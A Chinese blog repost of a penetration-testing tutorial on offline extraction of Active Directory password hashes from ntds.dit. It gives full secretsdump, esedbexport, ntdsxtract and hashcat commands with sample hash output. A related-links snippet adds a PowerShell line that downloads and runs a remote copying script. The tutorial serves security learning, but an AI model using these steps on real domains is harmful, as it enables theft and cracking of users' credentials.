Windows从ntds.dit中提取Hash和域信息

最新推荐文章于 2023-02-03 16:43:56 发布
最新推荐文章于 2023-02-03 16:43:56 发布
阅读量936 收藏
点赞数
分类专栏: WINDOWS
原文链接:https://www.freebuf.com/articles/system/151463.html
版权

在渗透测试进入内网之后,首要目标就是得到域控权限,将域中所有用户的hash值全部跑出来,下载到本地。很多工具比如meterpreter中的smart_hashdump和Impacket中的secretsdump.py都可以做到。

但是有些情况下我只能拷贝出来NTDS.dit文件,然后离线将这些密码提取出来。今天正好碰到了这一情况,接下来我将详细的介绍一下如何将密码导出,当然假设我已经成功将这两个文件下载到本地:

1. ntds.dit:Extensible storage engine DataBase, version 0x620, checksum 0xa50ff5a, page size 8192, DirtyShutdown, Windows version 6.1  
2. systemhive: MS Windows registry file, NT/2000 or above

使用Impacket

Imapacket的作者在twitter上告诉我secretsdump.py有一个本地选项,可以很简单的做到将密码提取出来。Impacket实在是太方便了,如果你已经有这两个文件,可以通过执行以下命令就可以得到hash值。

python secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

稍等一会,它就会将域中所有用户的NTLM hash值呈现出来:

这是最简单一种方法,如果你想尝试着使用ntdsxtract导出表,你可以继续阅读~

安装esedbexport

从NTDS.dit中导出用户表的第一步就是使用libesedb中的esedbexport,你可以在下面网页中下载到最新版本: https://github.com/libyal/libesedb/releases 我使用的版本是:”libesedb-experimental-20170121”

下载并且解压:

$ wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz
$ tar xf libesedb-experimental-20170121.tar.gz
$ cd libesedb-20170121/

安装依赖:

$ sudo apt-get install autoconf automake autopoint libtool pkg-config

进行安装:

$ ./configure
$ make
$ sudo make install
$ sudo ldconfig

如果一切顺利地话,你会在/usr/local/bin/esedbexport得到这个工具。

提取表

现在工具已经安装完成,使用这个工具可以从ntds.dit中提取出表,在执行过程中会新建一个名称为ntds.dit.export文件夹存放提取出来的表,命令为:

$ /usr/local/bin/esedbexport -m tables ntds.dit

这一步骤进行的时间有点长,在我的机器上进行了20-30分钟,在执行完毕之后,你会看到成功的分离出了表:

【不支持外链图片,请上传图片或单独粘贴图片】

两个重要的表为:datatable以及link_table,他们都会被存放在./ntds.dit.export/文件夹中.

使用ntdsxtract提取域中信息

一旦表被提取出来,很多python工具可以将这些表中的信息进一步提取,比如ntdsxtract就可以完美进行。

安装命令:

$ git clone https://github.com/csababarta/ntdsxtract.git
$ cd ntdsxtract/
$ python setup.py build && python setup.py install

执行完毕之后,ntdsxtract就会在你的系统上进行安装。

提取用户信息以及密码hash值

ntdsxtract工具中dsusers.py可以被用来从分离出来的表中提取用户信息以及NT/LM密码hash值。前提是具有如下三个文件:

datatable
link_table
system hive

这个工具的使用规则为:

dsusers.py <datatable> <link_table> <output_dir> --syshive <systemhive> --passwordhashes <format options>

–pwdformat选项是选择以什么格式进行提取,有john(John format),ocl(oclHashcat),ophc(OphCrack)三个选项。

这个工具还会将所获得信息输出出来,这也方便了我们可以将信息写入到其他文件当中。

以oclHashcat格式提取所有NT和LM的hash,并将它们保存在”output”目录中的”ntout”和”lmout”中:

$ dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive systemhive --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout |tee all_user_info.txt

执行结束之后,NT的hash值已经以oclHashcat格式提取出来了:

root@kali:~/ntds_cracking# head -n2 output/ntout  
user1:BC62AC0F8EA9DD1AD703C8B4F0A968C4  
user2:0E10081EDBCFB92DE6156F9046FF7881

进一步查看我们提取出来的文件,我们还可以看到其他信息,比如SID,密码修改时间,以及最后登录时间等等:

通过hashcat进行简单hash破解:

$ hashcat -m 1000 output/ntout --username /path/to/wordlist

进一步提取域中计算机信息

Ntdsxtract中还具有一个工具可以从分离出来的表中提取域中计算机信息。这对于离线分析目标信息是非常有用的。

在使用过程中,需要对它提供datatable,输出目录以及输出文件,格式为csv:

$ dscomputers.py ntds.dit.export/datatable.3 computer_output --csvoutfile all_computers.csv

执行完毕之后他会在all_computers.csv中写入所有域中计算机信息。如下:

head -n 1 computer_output/all_computers.csv
"Record ID";"Computer name";"DNS name";"GUID";"SID";"OS name";"OS version";"When created";"When changed";"Bitlocker recovery name";"Bitlocker recovery GUID";"Bitlocker volume GUID";"Bitlocker when created";"Bitlocker when changed";"Bitlocker recovery password";"Dial-In Permission"

总结

使用secretsdump.py或者其他方法可以很快的提取域中用户以及其他密码哈希等等信息。不过如果你想通过离线对NTDS.dit以及SYSTEM hive文件进行提取的话,希望这篇文章可以给你提供帮助。

TYW----子曰小玖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程提取Windows的系统凭证1
08-03
远程提取 Windows 的系统凭证 - 先知社帮他的 github 打个广告:先知社区,先知安全技术社区几十年没更新了 QAQ翻译下 bitsadmin 的
NTDS.dit获取密码hash
a3320315的博客
05-31 392
获取NTDS.dit 加载ps脚本 IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1"); 提取本地sam文件 Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam 提取域控NTDS.dit Invoke-NinjaCopy
内网安全:05.dump内网DC的ntds.dit,获取hash
qq_38473097的博客
06-21 649
叙述:有时候我们碰到一个内网环境,有DC的密码,于是使用这个方法,导出DC所有内网主机的密码并破解 0x0 环境 DC:172.31.20.30  domain用户:pentest\administrator 密码:UFhae&pwL%F 内网主机A(win 2012):172.31.21.166 psexec:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec secretsdump:https://github.co.
ntds.dit提取hash和域信息
一个安全路上的菜鸟
11-14 357
Impacket secretsdump.py -system <path_to_system_hive> -ntds <path_to_ntds.dit> LOCAL
域学习:域内信息搜集(暂时不讲工具)
E1even的博客
07-31 464
环境配置: win2008 (10.1.1.1) 上线域管理 win 2007(10.1.1.3)上线普通域用户 (感觉winxp不是很好用,因为有些命令没法执行,但是在07或者其他系列系统可以执行,因此还是选用07) 域内信息搜集 查看当前权限 whoami:(xp系统无法使用) 域管理员: 域用户: 本地普通用户: 域用户可以查询一些域内信息,本地用户无法查看 获取域SID 什么是SID:安全标识符(Security Identifiers),是标识用户、组和计算机帐户的唯一的号码 whoami
windows 删除服务_使用卷影拷贝服务提取 ntds.dit 的多种姿势
weixin_39929259的博客
12-11 321
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 32 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更Ntds.ditNtds.dit是主要的AD数据库,包括有关域用户,组和组成员身份的信息。它还包括域所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元的密钥对这些哈希值进行加密。我们拿到Ntd...
ntdsdump.zip
12-12
ntdsdump:快速从ntds.dit文件提取Hash密码的工具 使用命令举例:Hashcat64 -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username 参数说明: “-m 1000” 表示破解密码类型为“NTLM”; “-a 0”...
Passcape Windows Password Recovery Advanced 9.7 文版.zip
05-18
· 直接导入从SAM或ntds.dit; 即使这些文件已被系统锁定, 该程序还是会读取. · 导入哈希从远程电脑. · 导入哈希从系统的卷影副本, 还原点, 备份和修复文件夹. · 可以备份\保存本地注册表文件和活动目录数据库. ·...
Windows 服务器管理阶段测试题doc.docx
05-06
4. 检查AD安装正常的步骤:AD数据库文件通常位于NTDS文件夹,而不是SYSVOL文件夹,所以B选项描述错误。 5. 共享许可设定:若希望用户能修改和删除文件但不能更改权限,应设置为“Change”许可,所以答案是B. 6. ...
如何从零开始内网渗透学习.pdf
最新发布
04-29
libesedb 的搭建: ...tar zxvf libesedb-experimental-20151213.tar.gz cd libesedb-20151213/ ./configure make cd esedbtools/ (需要把刚刚 vbs 脱下来的 ntds.dit 放到 kali) ...mv ntds.dit.export/ ../../
内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1858
当获取一台域内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问域控或横向拓展,那么在获取本地用户、域用户凭证和获取域控Ntds.dit这一块就极其重要,将详细介绍红队渗透使用获取登录凭证的手法。
使用NTDSXtract离线抓取Domain Hash
weixin_30889885的博客
06-05 78
下载NTDSX http://www.ntdsxtract.com/ 下载libesedb http://code.google.com/p/libesedb/ 获得ntds.dit和SYSTEM文件: 2008和2012的域控用ntdsutil命令,网上有。 2008以下的域控,创建磁盘的shadow copy,然后拷贝ntds.dit和system。 有两个工具可共选择:Vs...
使用wsadmin.sh创建数据源所映射的数据库用户
Martin201609的博客
04-10 472
创建数据源所映射对应的用户: 脚本名称: create_ds_user.py 使用wsadmin.sh 调用 # list All Auth Users # 输出所有的用户,配置数据源时使用的用户 AdminTask.listAuthDataEntries() # create Auther User aliasname = 'testuser' username='dbtest...
Extensible Storage Engine
weixin_34088583的博客
08-10 268
较新的Windows SDK提供了一种非关系型嵌入式数据库引擎ESENT(Extensible Storage Engine),它适用于那些需要高性能、较小存储空间支出的应用。ESENT已应用于AD、Windows Desktop Search、Windows Live Mail多个微软产品。它有以下基本特点: 1、事务支持、延迟提交、健壮的恢复、备份。 2、记录级的锁。 3、高并发的数...
Windows域内密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-11 1554
文章目录域凭证介绍获取域内专属凭证(ntds.dit)卷影复制服务(Volume Shadow Copy Service (VSS)) 域凭证介绍 前提知识: Windows信息收集、渗透测试常用命令 (https://xunmi.blog.csdn.net/article/details/113782525) 获取Windows系统密码凭证: 了解Windows系统是如何对密码进行加密的和常用获取常规Windows电脑密码的手段! (https://xunmi.blog.csdn.net/articl
【内网学习笔记】26、ntds.dit提取与散列值导出
TeamsSix 的 CSDN 空间
09-09 1394
0、前言 在活动目录,所有数据都保存在 ntds.dit 文件ntds.dit 是一个二进制文件,存储位置为域控的 %SystemRoot%\ntds.dit ntds.dit 包含(但不限于)用户名、散列值、组、GPP、OU 等与活动目录相关的信息,因此如果我们拿到 ntds.dit 就能获取到域内所有用户hash 在通常情况下,即使拥有管理员权限,也无法读取域控ntds.dit 文件(因为活动目录始终访问这个文件,所以文件被禁止读取),它和 SAM 文件一样,是被 Windows 操作
怎么解析NTDS.dit
04-27
NTDS.ditWindows操作系统Active Directory数据库文件的一部分。要解析NTDS.dit文件,可以使用工具如dsdbutil、ntdsutil和esentutl等。这些工具可以帮助管理员执行各种操作,例如备份和还原数据库、重建索引、检查数据库状态等。此外,可以使用一些第三方工具进行NTDS.dit文件的解析,例如Active Directory解析器和LDP工具等。这些工具可以让管理员更方便地查看和管理Active Directory数据库文件。请注意,解析NTDS.dit文件需要具备一定的技术知识和经验,并且需要谨慎执行相关操作,以避免意外损坏数据库文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值